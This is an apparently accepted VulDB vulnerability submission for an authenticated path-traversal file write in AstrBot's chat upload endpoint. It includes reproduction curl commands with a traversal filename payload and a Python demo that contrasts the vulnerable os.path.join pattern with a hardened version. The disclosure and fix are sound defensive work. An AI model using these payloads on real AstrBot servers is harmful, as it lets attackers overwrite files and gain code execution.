Submission #811172: AstrBotDevs AstrBot latest Path Traversal (CWE-22)

Information

Title: AstrBotDevs AstrBot latest Path Traversal (CWE-22)
Description:

# Technical Details

An Arbitrary File Write vulnerability exists in the `post_file()` method in `astrbot/dashboard/routes/chat.py` (lines 149–163) of AstrBot. The application does not sanitize the `filename` field of multipart/form-data uploads before passing it to `os.path.join(attachments_dir, filename)` and `await file.save(path)`, so path traversal sequences (e.g. `../../../../tmp/evil.txt`) escape the intended attachments directory.

# Vulnerable Code

File: `astrbot/dashboard/routes/chat.py` (L149–163)
Method: `post_file()`
Why: the filename from the multipart upload is used directly in `os.path.join()` without `os.path.basename()` or `werkzeug.utils.secure_filename()`, so directory traversal writes files anywhere the server process can write. Note that `os.path.join()` also discards `attachments_dir` entirely when the client-supplied filename is absolute, so an absolute path is a second way to leave the directory.

# Reproduction

The endpoint requires a valid dashboard JWT, so the write is post-authentication.

1. Authenticate to obtain a JWT token:

```
curl -X POST http://127.0.0.1:6185/api/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username":"astrbot","password":"77b90590a8945a7d36c963981a307dc9"}'
```

2. Upload a file with a traversal filename:

```
curl -X POST http://127.0.0.1:6185/api/chat/post_file \
  -H "Authorization: Bearer <TOKEN>" \
  -F "[email protected];filename=../../../../../../../../tmp/pwned.txt"
```

3. Verify that the file was written outside the intended directory:

```
docker exec astrbot_container cat /tmp/pwned.txt
```

# Impact

- Arbitrary file write to any path writable by the server process
- Remote code execution via overwriting application scripts (`.py` files) or cron jobs
- Denial of service via overwriting critical system configuration files
- Data exfiltration enablement through cron/service configuration poisoning
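As an added illustration (this is not AstrBot's code nor the submitter's), the join pattern described above is placed beside a hardened variant that keeps only the last path component, rejects empty or dot-only names, and then confirms the resolved path is still inside the attachments directory. The attachments directory, the payload names and the function names are hypothetical and chosen for the demonstration; the standard library is used instead of `werkzeug.utils.secure_filename()` so the snippet has no dependency.

```python
import os

# Hypothetical values for the demonstration (not taken from AstrBot's configuration).
ATTACHMENTS_DIR = "/srv/astrbot/data/attachments"
TRAVERSAL_NAME = "../../../../../../../../tmp/pwned.txt"


def unsafe_attachment_path(attachments_dir: str, filename: str) -> str:
    """The pattern the report describes: the client-controlled filename goes
    straight into os.path.join(). '..' segments walk out of attachments_dir,
    and an absolute filename makes os.path.join() drop attachments_dir entirely."""
    return os.path.join(attachments_dir, filename)


def safe_attachment_path(attachments_dir: str, filename: str) -> str:
    """Hardened variant: keep only the last path component, reject names that
    are empty or pure dots, then confirm the resolved path is still inside the
    attachments directory. Raises ValueError on anything that fails."""
    base = os.path.realpath(attachments_dir)
    # Normalise backslashes first so a Windows-style '..\\..\\x' on a POSIX host
    # does not survive basename() as a single opaque component.
    name = os.path.basename(filename.replace("\\", "/"))
    if name in ("", ".", "..") or "\x00" in name:
        raise ValueError(f"rejected upload filename: {filename!r}")
    candidate = os.path.realpath(os.path.join(base, name))
    # Defence in depth: even after basename(), require containment.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes attachments directory: {candidate}")
    return candidate


def accepts(attachments_dir: str, filename: str) -> bool:
    """True if the hardened variant would store an upload with this filename."""
    try:
        safe_attachment_path(attachments_dir, filename)
        return True
    except ValueError:
        return False


def escapes(attachments_dir: str, path: str) -> bool:
    """True if `path`, once resolved, lies outside `attachments_dir`."""
    base = os.path.realpath(attachments_dir)
    return os.path.commonpath([base, os.path.realpath(path)]) != base


if __name__ == "__main__":
    # Constructed sample filenames: the report's payload, an absolute path,
    # a backslash traversal, a benign name and a bare '..'.
    for name in (TRAVERSAL_NAME, "/etc/cron.d/evil", "..\\..\\x.py", "report.pdf", ".."):
        vuln = unsafe_attachment_path(ATTACHMENTS_DIR, name)
        print(f"{name!r:45} vulnerable -> {os.path.normpath(vuln)} "
              f"(escapes={escapes(ATTACHMENTS_DIR, vuln)})")
        hardened = safe_attachment_path(ATTACHMENTS_DIR, name) if accepts(ATTACHMENTS_DIR, name) else "rejected"
        print(f"{'':45} hardened   -> {hardened}")
```

Running the block shows the report's payload resolving to `/tmp/pwned.txt` through the unsafe join, while the hardened function stores it as `.../attachments/pwned.txt`; an absolute filename demonstrates the case where `os.path.join()` drops the base directory outright. The final `commonpath()` check is what makes the function safe even if a later refactor feeds it a name that has not been through `basename()`.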
Source: https://gist.github.com/YLChen-007/054415c2b63e58813328bc879a90c504
User: Eric-a (UID 96353)
Submitted: 23.04.2026 09:31 (1 month ago)
Moderated: 16.05.2026 19:34 (23 days later)
Status: accepted
VulDB entry: 364381 [AstrBotDevs AstrBot up to 4.23.5 File Upload chat.py post_file filename path traversal]
Points: 20
